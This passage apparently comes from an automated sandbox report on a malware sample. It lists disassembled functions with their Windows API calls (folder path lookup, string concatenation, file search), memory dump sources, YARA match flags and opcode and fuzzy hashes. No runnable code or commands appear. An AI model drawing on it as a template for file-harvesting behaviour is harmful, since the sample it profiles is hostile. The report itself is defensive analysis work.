                                    • Instruction Fuzzy Hash: 52315771905218ABCF64EB95DD51FEEB3BEEB05700F104299F10AA66A0DB306F44CFA5
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006FFE13
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006FFE2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction ID: ec6e2bca692a7eeb848f8b4fa89239fd9eeb89ba62fba08d495ba916e8e4c89e
                                    • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction Fuzzy Hash: CC017132109729FEF63527745CC9AB63A96EF017B57344339F226852F3EF964C429140
                                    APIs
                                    • __getptd.LIBCMT ref: 0069CA7E
                                      • Part of subcall function 0069C2A0: __amsg_exit.LIBCMT ref: 0069C2B0
                                    • __getptd.LIBCMT ref: 0069CA95
                                    • __amsg_exit.LIBCMT ref: 0069CAA3
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0069CAC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 31953eba1985a658e597141e744e41cfcf1e6d1973a9114aaf8b21eabccc1295
                                    • Instruction ID: 5a3e14fb0a04d80bd8260c7dbc127983171a7bd14c2ad2ad16657187f216aa0e
                                    • Opcode Fuzzy Hash: 31953eba1985a658e597141e744e41cfcf1e6d1973a9114aaf8b21eabccc1295
                                    • Instruction Fuzzy Hash: 24F0B4329443189BDFA0FBF8A80379E33ABAF41730F51114EF405A6ED2CB245E419B99
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Catch
                                    • String ID: MOC$RCC
                                    • API String ID: 78271584-2084237596
                                    • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction ID: c057677caa6b4c0eeb4d2d0236bc3079cc21343676bedf441be97365510390ff
                                    • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction Fuzzy Hash: 43414B71900209EFDF15DF98DC81FAEBBB5BF48314F144259F904A6251D3399960DF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: T8p
                                    • API String ID: 0-3547239097
                                    • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                    • Instruction ID: 7c9be54063b6fd72ad54643f1dd1d62fbb6d30daf10c85345768823b73557268
                                    • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                    • Instruction Fuzzy Hash: 41218BF2600205FBDB20AF618CC886AB7EDAF003647105719F925C72D1E779EE4087A0
                                    APIs
                                      • Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 006951CA
                                    • lstrcat.KERNEL32(?,006A1058), ref: 006951E7
                                    • lstrcat.KERNEL32(?,01428F28), ref: 006951FB
                                    • lstrcat.KERNEL32(?,006A105C), ref: 0069520D
                                      • Part of subcall function 00694B60: wsprintfA.USER32 ref: 00694B7C
                                      • Part of subcall function 00694B60: FindFirstFileA.KERNEL32(?,?), ref: 00694B93
                                      • Part of subcall function 00694B60: StrCmpCA.SHLWAPI(?,006A0FC4), ref: 00694BC1
                                      • Part of subcall function 00694B60: StrCmpCA.SHLWAPI(?,006A0FC8), ref: 00694BD7
                                      • Part of subcall function 00694B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00694DCD
                                      • Part of subcall function 00694B60: FindClose.KERNEL32(000000FF), ref: 00694DE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 4f79168ce14c418f922d3daf1798d8758e0528d1816e69781b419a7492577055
                                    • Instruction ID: b96c356fba33ce422e3cad917837e92fb9c72325d68e39b42851386341f8497e
                                    • Opcode Fuzzy Hash: 4f79168ce14c418f922d3daf1798d8758e0528d1816e69781b419a7492577055
                                    • Instruction Fuzzy Hash: 922137B6904308ABCB94FBB0FC42EED733E9B95301F004648B65597495EE70ABC88F95